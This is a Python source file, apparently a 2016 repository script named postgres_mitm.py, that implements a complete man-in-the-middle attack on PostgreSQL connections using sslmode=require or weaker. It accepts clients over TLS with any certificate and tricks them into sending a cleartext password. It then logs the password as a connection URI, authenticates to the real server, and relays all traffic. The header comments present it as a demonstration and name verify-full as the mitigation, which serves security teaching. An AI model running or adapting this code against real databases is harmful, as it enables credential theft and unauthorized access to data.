postgres-mitm/postgres_mitm.py
2016-05-30 08:35:03 -07:00

327 lines
11 KiB
Python

from __future__ import print_function
# This script demonstrates how to setup a Man-in-the-Middle (MitM) attack on a
# Postgres connection with SSLMODE=require or less. Attack is mitigated by
# setting SSLMODE=verify or SSLMODE=verify-full, which requires you to get the
# certificate of either your server or a CA that has signed it's certificate.
# What the script does:
# listen on socket for ssl startup messages
# reply with 'S' (supported?)
# Do TLS handshake with random cert/key
# Tell client to authenticate over plaintext to capture the password
# Initiate database connection to actual backend using the supplied password
# Proxy all traffic between the client and the actual database
# The backend database to proxy must be given as an argument on the command
# line for now, but in an actual attack you would read this from the redirect
# fields on the IP packets or similar, depending on how you're performing the
# attack.
import argparse
import hashlib
import socket
import ssl
import select
import struct
import sys
import threading
import logging
from collections import namedtuple
# Sent by client when requesting TLS connection
SSL_STARTUP_REQUEST = '\x00\x00\x00\x08\x04\xd2\x16\x2f'
SSL_STARTUP_RESPONSE = 'S'
VERSION_3 = '\x00\x03\x00\x00'
_logger = logging.getLogger(__name__)
# Lifted from pqcomm.h
AUTH_METHODS = {
'AUTH_REQ_OK': 0, # User is authenticated
'AUTH_REQ_KRB4': 1, # Kerberos V4. Not supported any more.
'AUTH_REQ_KRB5': 2, # Kerberos V5. Not supported any more.
'AUTH_REQ_PASSWORD': 3, # Password
'AUTH_REQ_CRYPT': 4, # crypt password. Not supported any more.
'AUTH_REQ_MD5': 5, # md5 password
'AUTH_REQ_SCM_CREDS': 6, # transfer SCM credentials
'AUTH_REQ_GSS': 7, # GSSAPI without wrap()
'AUTH_REQ_GSS_CONT': 8, # Continue GSS exchanges
'AUTH_REQ_SSPI': 9, # SSPI negotiate without wrap()
}
AUTH_METHODS_REVERSE = {val: key for key, val in AUTH_METHODS.items()}
def main():
args = get_args()
configure_logger(args.logging_level)
target_backend = args.backend
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('0.0.0.0', 5432))
# max queued connections
backlog = 5
sock.listen(backlog)
_logger.info('Listening for connections')
try:
while True:
client_socket, address = sock.accept()
client_handler = ClientConnection(client_socket, target_backend)
client_handler.start()
except (KeyboardInterrupt, SystemExit):
_logger.info('Received exit, shutting down sockets')
sock.shutdown(socket.SHUT_RDWR)
sock.close()
def get_args():
parser = argparse.ArgumentParser('postgres-mitm')
parser.add_argument('backend')
parser.add_argument('-l', '--logging-level',
choices=('debug', 'info', 'warning'), default='info')
return parser.parse_args()
def configure_logger(level):
logging.basicConfig(format='%(asctime)-15s [%(levelname)s] %(message)s')
_logger.setLevel(getattr(logging, level.upper()))
class ClientConnection(threading.Thread):
def __init__(self, client_socket, target_backend):
super(ClientConnection, self).__init__()
self.ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
self.ssl_context.load_cert_chain(certfile='server.cert', keyfile='server.key')
self.socket = client_socket
self.packet_handler = self.handle_startup_packet
self.target_backend = target_backend
self.server_socket = None
def run(self):
_logger.debug('Thread running')
# wait for startup packet
buffer_size = 4096
data_sent = self.socket.recv(buffer_size)
if data_sent == SSL_STARTUP_REQUEST:
_logger.debug('Got SSL startup request')
self.socket.send(SSL_STARTUP_RESPONSE)
self.listen_for_tls_handshake()
data = self.socket.read()
try:
while data:
if not self.packet_handler(data):
break
if self.server_socket:
# Switch to select-based IO
break
data = self.socket.read()
else:
_logger.warning('No more data received')
raise Exception('No more data')
_logger.debug('Using select to wait for data')
while True:
sockets_with_data = select.select([self.server_socket, self.socket], [], [])[0]
if self.socket in sockets_with_data:
data = self.socket.read()
_logger.debug('Client -> Server: %s' % repr(data))
if data:
self.server_socket.send(data)
else:
self.socket.close()
self.server_socket.shutdown(socket.SHUT_RDWR)
self.server_socket.close()
break
if self.server_socket in sockets_with_data:
data = self.server_socket.read()
_logger.debug('Server -> Client: %s' % repr(data))
if data:
self.socket.send(data)
else:
self.socket.shutdown(socket.SHUT_RDWR)
self.socket.close()
self.server_socket.shutdown(socket.SHUT_RDWR)
self.server_socket.close()
finally:
self.terminate()
def handle_startup_packet(self, data):
self.startup_packet = data
self.options = parse_options_from_startup_packet(data)
_logger.debug('Startup packet processed successfully: %s' % self.options)
auth_reply = 'R%(length)s%(method)s' % {
'length': struct.pack('!I', 8),
'method': struct.pack('!I', AUTH_METHODS['AUTH_REQ_PASSWORD']),
}
_logger.debug('Replying to startup: %s' % repr(auth_reply))
self.socket.send(auth_reply)
self.packet_handler = self.handle_authentication_request
return True
def handle_authentication_request(self, data):
_logger.debug('Got auth request packet: %s' % repr(data))
password = parse_password_from_authentication_packet(data)
if self.connect_to_actual_backend(password):
captured_uri = 'postgres://%(user)s:%(password)s@%(host)s:5432/%(database)s' % {
'user': self.options.get('user', ''),
'password': password,
'host': self.target_backend,
'database': self.options.get('database', ''),
}
auth_success = 'R%(length)s%(status)s' % {
'length': struct.pack('!I', 8),
'status': struct.pack('!I', AUTH_METHODS['AUTH_REQ_OK']),
}
_logger.info('Success! Intercepted auth: %s' % captured_uri)
self.socket.send(auth_success)
self.packet_handler = self.handle_data
# Switch socket to non-blocking to enable messages to pass in
# arbitrary order
self.socket.setblocking(0)
else:
return False
return True
def connect_to_actual_backend(self, password):
sock = socket.create_connection((self.target_backend, 5432))
sock.send(SSL_STARTUP_REQUEST)
buffer_size = 1024
data = sock.recv(buffer_size)
assert data == 'S'
sock = self.ssl_context.wrap_socket(sock)
sock.do_handshake()
sock.send(self.startup_packet)
data = sock.recv()
_logger.debug('Got reply to startup: %s' % repr(data))
auth_request = parse_auth_request_packet(data)
if auth_request.method == 'AUTH_REQ_MD5':
# options is 4-byte salt
salt = auth_request.options
response = create_md5_auth_packet(self.options.get('user', ''), password, salt)
sock.send(response)
else:
_logger.debug('Unsupported backend auth method: %s' % auth_request.method)
return False
self.server_socket = sock
self.packet_handler = self.handle_data
# Receive auth response and forward to client
data = self.server_socket.recv()
self.socket.send(data)
# Make socket non-blocking
self.server_socket.setblocking(0)
return True
def handle_data(self, data):
_logger.debug('Handling client data: %s' % repr(data))
if data:
self.server_socket.send(data)
return True
def handle_server_data(self, data):
_logger.debug('Handling server data: %s' % repr(data))
if data:
self.socket.send(data)
return True
def listen_for_tls_handshake(self):
self.socket = self.ssl_context.wrap_socket(self.socket, server_side=True)
def terminate(self):
_logger.debug('Terminating thread')
for sock in (self.socket, self.server_socket):
if not sock:
continue
try:
if not socket_is_closed(self.socket):
self.socket.shutdown(socket.SHUT_RDWR)
self.socket.close()
except:
_logger.exception('Got exception when trying to close socket')
def socket_is_closed(sock):
return isinstance(sock._sock, socket._closedsocket)
def create_md5_auth_packet(username, password, salt):
pw_and_username = password + username
pw_hash = hashlib.md5(pw_and_username).hexdigest()
salted_hash = 'md5' + hashlib.md5(pw_hash + salt).hexdigest()
response = 'p%(length)s%(salted_hash)s\0' % {
# 32 bytes of digest, four bytes length, 3 bytes for 'md5', one byte terminating null
'length': struct.pack('!I', 40),
'salted_hash': salted_hash,
}
return response
def parse_options_from_startup_packet(data):
assert len(data) >= 8
packet_length = struct.unpack('!I', data[0:4])[0]
raw_version = data[4:8]
assert raw_version == VERSION_3, 'Only version 3 of the psql protocol is supported'
# format is [<key>\0<value>\0]+\0
raw_key_value_pairs = data[8:]
assert raw_key_value_pairs[-1] == '\0'
raw_key_value_pairs = raw_key_value_pairs[0:-1]
assert raw_key_value_pairs.count('\0') % 2 == 0
options = {}
key_value_pairs = data[8:].split('\0')
for i in range(0, len(key_value_pairs), 2):
key = key_value_pairs[i]
value = key_value_pairs[i + 1]
options[key] = value
return options
def parse_password_from_authentication_packet(data):
assert len(data) >= 6
assert data[0] == 'p'
raw_length = data[1:5]
length = struct.unpack('!I', raw_length)
assert data[-1] == '\0'
return data[5:-1]
def parse_auth_request_packet(data):
# format is R<int32 length><int32 method>[<options>]
assert len(data) >= 9
assert data[0] == 'R'
raw_length = data[1:5]
length = struct.unpack('!I', raw_length)[0] # TODO: Unused
raw_method = data[5:9]
method = struct.unpack('!I', raw_method)[0]
assert method in AUTH_METHODS_REVERSE
textual_method = AUTH_METHODS_REVERSE[method]
AuthRequest = namedtuple('AuthRequest', 'method options')
return AuthRequest(textual_method, data[9:])
if __name__ == '__main__':
main()